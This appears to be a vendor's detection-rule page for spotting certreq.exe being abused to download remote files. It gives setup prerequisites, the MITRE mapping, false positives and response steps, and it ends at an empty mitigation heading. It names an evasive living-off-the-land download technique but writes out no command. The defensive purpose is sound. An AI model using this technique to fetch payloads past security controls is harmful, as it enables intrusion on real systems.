Suspicious Certreq Command to Download

About the rule

Rule Type

Standard

Rule Description

This detection identifies suspicious usage of certreq.exe—a legitimate Windows tool used for certificate requests—being leveraged to download files from remote servers. While certreq.exe is not typically associated with file downloads, threat actors may abuse it to bypass traditional security controls, as it is often trusted and less scrutinized by antivirus or endpoint protection systems. This behavior may indicate attempts to download malicious payloads or configuration files using trusted living-off-the-land binaries (LOLBins).

Severity

Trouble

Rule journey

Attack chain scenario

Initial Access → Execution → Defense Evasion → Command and Control

Impact

• Command and Control
• Defense evasion
• Credential theft
• Execution of malicious payloads

Rule Requirement

Prerequisites

Using Windows event viewer:
To enable detailed process tracking in a domain environment, log in to a domain controller using domain admin credentials and open the Group Policy Management Console (GPMC). Create or edit a GPO linked to the target OU and navigate to the Advanced Audit Policy Configuration section to enable success auditing for both process creation and termination. To capture command-line details, enable the Include command line in process creation events setting under Audit Process Creation. Additionally, create the Microsoft-Windows-Security-Auditing/Operational registry key in the specified EventLog path to support enhanced auditing.

Using Sysmon:
To enable detailed process monitoring using Sysmon, first download and install it from Microsoft Sysinternals. Run Command Prompt as an administrator and install Sysmon with a configuration file that includes process creation tracking using sysmon.exe -i [configfile.xml]. Ensure your configuration includes a <ProcessCreate> filter to capture all process creation events. Additionally, create the Microsoft-Windows-Sysmon/Operational registry key under the EventLog path if it doesn’t already exist.

Criteria

Detection

Execution Mode

realtime

Log Sources

Windows

MITRE ATT&CK

Command and Control: Ingress Tool Transfer (T1105)

Security Standards

Enabling this rule will help you meet the security standard's requirement listed below:

PR.DS-01: The confidentiality, integrity, and availability of data-at-rest are protected

When this rule is triggered, it indicates that certreq.exe—typically used for certificate requests—was executed in a manner suggesting it was used to download a file.

Author

Christian Burkard (Nextron Systems)

Future actions

Known False Positives

Legitimate administrative tasks involving certificate enrollment or renewal—especially in environments using automated certificate management solutions—might generate similar certreq.exe command-line activity.

Next Steps

When this rule is triggered, the following measures can be implemented:

• Identification: Review the command-line arguments used with certreq.exe, especially any URLs or file paths.
• Analysis: Identify the parent process and check if it’s an unusual script or application.
• Response: Isolate the endpoint, block the external domain or IP, and remove the downloaded file.
• Restrict Tool Usage: Limit access to system tools like certreq.exe to only trusted users and sanctioned processes via application control or AppLocker policies.

Mitigation

Mitigation: